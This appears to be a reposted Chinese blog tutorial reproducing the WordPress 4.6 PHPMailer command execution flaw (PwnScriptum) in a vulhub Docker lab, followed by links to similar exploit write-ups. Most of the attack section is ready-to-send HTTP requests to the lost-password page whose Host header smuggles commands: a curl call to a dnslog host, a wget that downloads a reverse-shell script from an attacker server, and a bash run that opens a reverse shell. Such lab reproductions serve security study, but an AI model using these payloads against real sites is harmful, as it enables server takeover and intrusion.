2. 程式人生 > 其它 >Wordpress 4.6 任意命令執行漏洞

Wordpress 4.6 任意命令執行漏洞

阿新 發佈:2021-07-02

Wordpress 4.6 任意命令執行漏洞

Wordpress 4.6 任意命令執行漏洞(PwnScriptum)

當WordPress 使用 PHPMailer 元件向用戶傳送郵件。攻擊者在找回密碼時會使用PHPmailer傳送重置密碼的郵件,利用substr(字串擷取函式)、$run(系統呼叫函式)等構造payload,即可進行遠端命令執行。

漏洞環境

我們先下載環境,在github有別人直接搭建好的docker環境我們直接拿來用即可

git clone git://github.com/vulhub/vulhub.git
cd vulhub/wordpress/pwnscriptum/
docker-compose up -d

訪問IP:8080/即可看到一個wordpress安裝介面頁面。

影響版本

WordPress <= 4.6.0

PHPMailer < 5.2.18

漏洞復現

然後跟著預設下一步安裝即可

漏洞在找回密碼的頁面,這是測試是否存在的payload,裡面的user_login為你自己設定存在的賬號,由於有些字元不能用,我們用${substr{0}{1}{$spool_directory}}代替/,${substr{10}{1}{$tod_log}}代替空格

POST /wp-login.php?action=lostpassword HTTP/1.1
Host: edi(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}curl${substr{10}{1}{$tod_log}}wb5hh4.dnslog.cn}} null)
Connection: close
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Accept: */*
Content-Length: 63
Content-Type: application/x-www-form-urlencoded

wp-submit=Get+New+Password&redirect_to=&[email protected]

執行後發現dnslog接收,證明命令執行成功漏洞存在

開啟一個web服務存放反彈shell指令碼

執行payload使目標伺服器下載這個指令碼

POST /wp-login.php?action=lostpassword HTTP/1.1
Host: edi(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}usr${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}wget${substr{10}{1}{$tod_log}}--output-document${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell${substr{10}{1}{$tod_log}}IP地址${substr{0}{1}{$spool_directory}}edi.txt}} null	)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
Origin: http://192.168.200.23:8080
Connection: close
Referer: http://192.168.200.23:8080/wp-login.php?action=lostpassword
Cookie: ECS[visit_times]=9; wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1

user_login=admin%40qq.com&redirect_to=&wp-submit=%E8%8E%B7%E5%8F%96%E6%96%B0%E5%AF%86%E7%A0%81

web服務監聽80發現指令碼被人訪問,上面的命令執行成功

伺服器監聽1234埠

傳送payload使目標伺服器執行指令碼

POST /wp-login.php?action=lostpassword HTTP/1.1
Host: edi(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}bash${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}shell}} null)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
Origin: http://192.168.200.23:8080
Connection: close
Referer: http://192.168.200.23:8080/wp-login.php?action=lostpassword
Cookie: ECS[visit_times]=9; wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1

user_login=admin%40qq.com&redirect_to=&wp-submit=%E8%8E%B7%E5%8F%96%E6%96%B0%E5%AF%86%E7%A0%81

反彈shell成功

相關推薦

Wordpress 4.6 任意命令執行漏洞

Wordpress 4.6 任意命令執行漏洞 Wordpress 4.6 任意命令執行漏洞(PwnScriptum) 當WordPress 使用 PHPMailer 元件向用戶傳送郵件。攻擊者在找回密碼時會使用PHPmailer傳送重置密碼的郵件,利用substr(字串擷取函式

WordPress 4.6遠端程式碼執行漏洞(CVE-2016-10033)復現環境搭建指南

首先是找到網上的漏洞分析和poc指令碼,WordPress <4.7.1 遠端程式碼執行漏洞(非外掛無需認證,附Poc,演示視訊)——具體關於漏洞的分析不多說了,這個說得很好了,主要是說環境搭建。

Joomla-3.4.6遠端程式碼執行漏洞復現

#01 Joomla簡介 Joomla!是一套自由、開放原始碼的內容管理系統,以PHP撰寫,用於釋出內容在全球資訊網與內部網,通常被用來搭建商業網站、個人部落格、資訊管理系統、Web 服務等,還可以進行二次開發以擴充使用範圍。

Wordpress <= 4.9.6 任意檔案刪除漏洞

Wordpress <= 4.9.6 任意檔案刪除漏洞 前言 從 3.7.0 版本開始, WordPress 在使用者登入時,會在後臺對小版本的改變進行更新,這樣不利於我們分析程式碼。我們可以通過將 AUTOMATIC_UPDATER_DISABLED 設定成 t

CVE-2020-10977-GITLAB CE/EE 任意檔案讀取導致遠端命令執行漏洞-環境搭建及完整復現圖文詳細筆記

漏洞環境搭建-CENTOS7 1.安裝依賴軟體 yum -y install policycoreutils openssh-server openssh-clients postfix

gitlist 0.6.0 遠端命令執行漏洞(CVE-2018-1000533)

gitlist是一款使用PHP開發的圖形化git倉庫檢視工具。在其0.6.0版本及以前,存在一處命令引數注入問題,可以導致遠端命令執行漏洞

命令執行漏洞利用及繞過方式總結

命令注入常見的方法 1.常見管道符   Windows系統支援的管道符   Linux系統支援的管道符

Redis遠端命令執行漏洞復現

本文首發於我的個人部落格,記錄了我在實驗室學習滲透測試所做的第二個漏洞復現,全部過程記錄在此,以便後續檢視,同時也希望本文能對您有所幫助。

檔案包含上傳漏洞&目錄遍歷命令執行漏洞

檔案上傳漏洞: 一句話木馬 一句話木馬主要由兩部分組成:執行函式與接收被執行程式碼的變數

fastjson遠端命令執行漏洞復現

fastjson遠端命令執行漏洞復現 使用vulhub提供的docker環境:https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce

攻防世界-web-php_rce(ThinkPHP 5.0命令執行漏洞

本題進入場景後顯示如下頁面 這是一個 thinkphp 框架,先檢視版本號。在網址上隨意輸入一個不存在的模組 地址:

命令執行漏洞攻擊&修復建議

應用程式有時需要呼叫一些執行系統命令的函式,如在PHP中,使用system、exec、shell_exec、passthru、popen、proc_popen等函式可以執行系統命令。當黑客能控制這些函式中的引數時,就可以將惡意的系統命令拼接到正常

Maccms8.x 遠端命令執行漏洞分析

前言 復現原始碼地址:https://github.com/yaofeifly/Maccms8.x 除錯中xdebug突然自動停止,新增下httpd.conf中的FcgidIOTimeout

Weblogic未授權遠端命令執行漏洞(CVE-2020-14882&CVE-2020-14883)復現

Weblogic是Oracle公司推出的J2EE應用伺服器,CVE-2020-14882允許未授權的使用者繞過管理控制檯的許可權驗證訪問後臺,CVE-2020-14883允許後臺任意使用者通過HTTP協議執行任意命令。使用這兩個漏洞組成的利用鏈,可通

weblogic 未授權命令執行漏洞(CVE-2020-14882,CVE-2020-14883)復現

漏洞描述 2020年10月29日,360CERT監測發現 Weblogic ConSole HTTP 協議程式碼執行漏洞,該漏洞編號為 CVE-2020-14882,CVE-2020-14883 ,漏洞等級:嚴重,漏洞評分:9.8。遠端攻擊者可以構造特殊的HTTP請求,在未經身

Weblogic遠端命令執行漏洞復現(CVE-2020-14645)

影響版本 Oracle WebLogic Server 10.3.6.0.0 Oracle WebLogic Server 12.1.3.0.0 Oracle WebLogic Server 12.2.1.3.0

企業安全06-Apache Log4j Server 反序列化命令執行漏洞(CVE-2017-5645)

CVE-2017-5645 Apache Log4j Server 反序列化命令執行漏洞(CVE-2017-5645) 一、漏洞原理 Apache Log4j是一個用於Java的日誌記錄庫,其支援啟動遠端日誌伺服器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻

浙江宇視科技安防(DVR/NVR)等監控裝置命令執行漏洞復現

宣告 本文內容僅供學習交流使用,請勿利用文章內的相關技術從事非法測試,如因此產生的一切不良後果與文章作者無關。

Weblogic命令執行漏洞(CVE-2018-2628)復現

一、漏洞環境搭建 CVE-2018-2628影響的軟體版本為: Weblogic 10.3.6.0 Weblogic 12.1.3.0 Weblogic 12.2.1.2

CVE-2018-1273 Spring Data Commons 遠端命令執行漏洞復現

一、漏洞描述 Spring Data是一個用於簡化資料庫訪問,並支援雲服務的開源框架,Spring Data Commons是Spring Data下所有子專案共享的基礎框架。Spring Data Commons 在2.0.5及以前版本中,存在一處SpEL表示式注入漏洞